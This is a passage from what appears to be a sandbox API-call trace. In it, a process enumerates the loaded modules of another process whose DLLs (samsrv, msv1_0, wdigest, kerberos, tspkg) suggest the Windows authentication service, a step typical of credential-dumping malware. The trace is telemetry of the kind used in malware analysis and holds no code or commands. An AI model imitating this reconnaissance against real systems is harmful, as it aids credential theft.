0x1d [0074.084] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd330000, lpmodinfo=0x256fe70, cb=0x18 | out: lpmodinfo=0x256fe70*(lpBaseOfDll=0x7fefd330000, SizeOfImage=0xbd000, EntryPoint=0x7fefd33107c)) returned 1 [0074.086] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd330000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SAMSRV.dll") returned 0xa [0074.087] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd330000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMSRV.dll" (normalized: "c:\\windows\\system32\\samsrv.dll")) returned 0x1e [0074.089] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd310000, lpmodinfo=0x2572030, cb=0x18 | out: lpmodinfo=0x2572030*(lpBaseOfDll=0x7fefd310000, SizeOfImage=0x14000, EntryPoint=0x7fefd314160)) returned 1 [0074.090] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd310000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cryptdll.dll") returned 0xc [0074.091] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd310000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")) returned 0x20 [0074.092] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x2574318, cb=0x18 | out: lpmodinfo=0x2574318*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0074.093] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0074.094] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0074.095] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd2a0000, lpmodinfo=0x25764d8, cb=0x18 | out: lpmodinfo=0x25764d8*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0074.097] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0074.098] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0074.099] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x2578698, cb=0x18 | out: lpmodinfo=0x2578698*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0074.100] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0074.102] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0074.103] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x257a858, cb=0x18 | out: lpmodinfo=0x257a858*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0074.105] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0074.106] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0074.107] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd290000, lpmodinfo=0x257ca18, cb=0x18 | out: lpmodinfo=0x257ca18*(lpBaseOfDll=0x7fefd290000, SizeOfImage=0x9000, EntryPoint=0x7fefd291040)) returned 1 [0074.109] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cngaudit.dll") returned 0xc [0074.110] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cngaudit.dll" (normalized: "c:\\windows\\system32\\cngaudit.dll")) returned 0x20 [0074.111] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd260000, lpmodinfo=0x257ebe8, cb=0x18 | out: lpmodinfo=0x257ebe8*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0074.113] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0074.114] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0074.116] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd210000, lpmodinfo=0x2580dc0, cb=0x18 | out: lpmodinfo=0x2580dc0*(lpBaseOfDll=0x7fefd210000, SizeOfImage=0x50000, EntryPoint=0x7fefd2111e0)) returned 1 [0074.117] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd210000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0074.118] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd210000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")) returned 0x1e [0074.120] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1e0000, lpmodinfo=0x2582f80, cb=0x18 | out: lpmodinfo=0x2582f80*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0074.121] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0074.123] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0074.125] GetModuleInformation (in: hProcess=0x214, hModule=0x75540000, lpmodinfo=0x2585140, cb=0x18 | out: lpmodinfo=0x2585140*(lpBaseOfDll=0x75540000, SizeOfImage=0x2000, EntryPoint=0x0)) returned 1 [0074.126] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75540000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msprivs.DLL") returned 0xb [0074.128] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75540000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msprivs.DLL" (normalized: "c:\\windows\\system32\\msprivs.dll")) returned 0x1f [0074.129] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd180000, lpmodinfo=0x2587300, cb=0x18 | out: lpmodinfo=0x2587300*(lpBaseOfDll=0x7fefd180000, SizeOfImage=0x32000, EntryPoint=0x7fefd18144c)) returned 1 [0074.131] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd180000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netjoin.dll") returned 0xb [0074.132] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd180000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")) returned 0x1f [0074.135] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd150000, lpmodinfo=0x25894c0, cb=0x18 | out: lpmodinfo=0x25894c0*(lpBaseOfDll=0x7fefd150000, SizeOfImage=0x24000, EntryPoint=0x7fefd1688c4)) returned 1 [0074.136] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd150000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="negoexts.DLL") returned 0xc [0074.138] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd150000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\negoexts.DLL" (normalized: "c:\\windows\\system32\\negoexts.dll")) returned 0x20 [0074.140] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x258b690, cb=0x18 | out: lpmodinfo=0x258b690*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0074.141] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0074.143] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0074.145] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x258d850, cb=0x18 | out: lpmodinfo=0x258d850*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0074.146] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cryptbase.dll") returned 0xd [0074.148] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0074.150] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd090000, lpmodinfo=0x258fa20, cb=0x18 | out: lpmodinfo=0x258fa20*(lpBaseOfDll=0x7fefd090000, SizeOfImage=0xb8000, EntryPoint=0x7fefd0b2de0)) returned 1 [0074.152] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd090000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kerberos.DLL") returned 0xc [0074.153] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd090000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kerberos.DLL" (normalized: "c:\\windows\\system32\\kerberos.dll")) returned 0x20 [0074.155] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x2591bf0, cb=0x18 | out: lpmodinfo=0x2591bf0*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0074.157] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0074.159] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0074.161] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x2593db0, cb=0x18 | out: lpmodinfo=0x2593db0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0074.163] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0074.165] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0074.167] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x2596188, cb=0x18 | out: lpmodinfo=0x2596188*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0074.169] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0074.171] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0074.173] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x2598338, cb=0x18 | out: lpmodinfo=0x2598338*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0074.175] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0074.177] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0074.179] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x259a4f8, cb=0x18 | out: lpmodinfo=0x259a4f8*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0074.181] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0074.184] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0074.186] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcfa0000, lpmodinfo=0x259c6b8, cb=0x18 | out: lpmodinfo=0x259c6b8*(lpBaseOfDll=0x7fefcfa0000, SizeOfImage=0x52000, EntryPoint=0x7fefcfa3e84)) returned 1 [0074.188] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcfa0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msv1_0.DLL") returned 0xa [0074.190] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcfa0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msv1_0.DLL" (normalized: "c:\\windows\\system32\\msv1_0.dll")) returned 0x1e [0074.192] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcef0000, lpmodinfo=0x259e878, cb=0x18 | out: lpmodinfo=0x259e878*(lpBaseOfDll=0x7fefcef0000, SizeOfImage=0xae000, EntryPoint=0x7fefcf04100)) returned 1 [0074.194] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcef0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netlogon.DLL") returned 0xc [0074.201] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcef0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netlogon.DLL" (normalized: "c:\\windows\\system32\\netlogon.dll")) returned 0x20 [0074.203] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce90000, lpmodinfo=0x25a0a48, cb=0x18 | out: lpmodinfo=0x25a0a48*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0074.206] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0074.208] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0074.210] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce60000, lpmodinfo=0x25a2c08, cb=0x18 | out: lpmodinfo=0x25a2c08*(lpBaseOfDll=0x7fefce60000, SizeOfImage=0x30000, EntryPoint=0x7fefce6194c)) returned 1 [0074.213] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="logoncli.dll") returned 0xc [0074.215] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")) returned 0x20 [0074.217] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce00000, lpmodinfo=0x25a4df0, cb=0x18 | out: lpmodinfo=0x25a4df0*(lpBaseOfDll=0x7fefce00000, SizeOfImage=0x57000, EntryPoint=0x7fefce05e38)) returned 1 [0074.219] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="schannel.DLL") returned 0xc [0074.222] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\schannel.DLL" (normalized: "c:\\windows\\system32\\schannel.dll")) returned 0x20 [0074.228] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x25a6fc0, cb=0x18 | out: lpmodinfo=0x25a6fc0*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0074.230] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0074.233] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0074.235] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcdc0000, lpmodinfo=0x25a9180, cb=0x18 | out: lpmodinfo=0x25a9180*(lpBaseOfDll=0x7fefcdc0000, SizeOfImage=0x36000, EntryPoint=0x7fefcdc1ad0)) returned 1 [0074.238] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcdc0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wdigest.DLL") returned 0xb [0074.240] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcdc0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wdigest.DLL" (normalized: "c:\\windows\\system32\\wdigest.dll")) returned 0x1f [0074.242] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x25ab340, cb=0x18 | out: lpmodinfo=0x25ab340*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0074.245] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0074.247] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0074.250] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd50000, lpmodinfo=0x25ad500, cb=0x18 | out: lpmodinfo=0x25ad500*(lpBaseOfDll=0x7fefcd50000, SizeOfImage=0x19000, EntryPoint=0x7fefcd511fc)) returned 1 [0074.252] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="tspkg.DLL") returned 0x9 [0074.255] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\tspkg.DLL" (normalized: "c:\\windows\\system32\\tspkg.dll")) returned 0x1d [0074.257] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd00000, lpmodinfo=0x25af6c0, cb=0x18 | out: lpmodinfo=0x25af6c0*(lpBaseOfDll=0x7fefcd00000, SizeOfImage=0x45000, EntryPoint=0x7fefcd32ccc)) returned 1 [0074.260] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="pku2u.DLL") returned 0x9 [0074.262] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pku2u.DLL" (normalized: "c:\\windows\\system32\\pku2u.dll")) returned 0x1d [0074.265] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefccb0000, lpmodinfo=0x25b1880, cb=0x18 | out: lpmodinfo=0x25b1880*(lpBaseOfDll=0x7fefccb0000, SizeOfImage=0x4c000, EntryPoint=0x7fefccb7950)) returned 1 [0074.267] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefccb0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="bcryptprimitives.dll") returned 0x14 [0074.270] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefccb0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")) returned 0x28 [0074.273] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x25b3a70, cb=0x18 | out: lpmodinfo=0x25b3a70*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0074.276] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0074.279] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0074.281] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc90000, lpmodinfo=0x25b5c40, cb=0x18 | out: lpmodinfo=0x25b5c40*(lpBaseOfDll=0x7fefcc90000, SizeOfImage=0x12000, EntryPoint=0x7fefcc9b750)) returned 1 [0074.284] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="efslsaext.dll") returned 0xd [0074.286] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\efslsaext.dll" (normalized: "c:\\windows\\system32\\efslsaext.dll")) returned 0x21 [0074.289] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcbf0000, lpmodinfo=0x25b7e10, cb=0x18 | out: lpmodinfo=0x25b7e10*(lpBaseOfDll=0x7fefcbf0000, SizeOfImage=0x3e000, EntryPoint=0x7fefcbf1040)) returned 1 [0074.292] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcbf0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="scecli.DLL") returned 0xa [0074.295] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcbf0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\scecli.DLL" (normalized: "c:\\windows\\system32\\scecli.dll")) returned 0x1e [0074.297] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x25b9fd0, cb=0x18 | out: lpmodinfo=0x25b9fd0*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0074.300] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0074.303] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0074.307] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x25bc190, cb=0x18 | out: lpmodinfo=0x25bc190*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0074.309] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0074.312] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0074.315] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb270000, lpmodinfo=0x25be350, cb=0x18 | out: lpmodinfo=0x25be350*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0074.319] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb270000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0074.323] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb270000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0074.326] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb260000, lpmodinfo=0x25c0520, cb=0x18 | out: lpmodinfo=0x25c0520*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0074.329] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0074.332] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0074.335] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9c0000, lpmodinfo=0x25c26e0, cb=0x18 | out: lpmodinfo=0x25c26e0*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0074.338] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0074.341] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0074.344] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9a0000, lpmodinfo=0x25c48b0, cb=0x18 | out: lpmodinfo=0x25c48b0*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0074.347] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0074.350] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0074.354] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb20000, lpmodinfo=0x25c6a70, cb=0x18 | out: lpmodinfo=0x25c6a70*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0074.357] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0074.360] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0074.363] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x25c8c30, cb=0x18 | out: 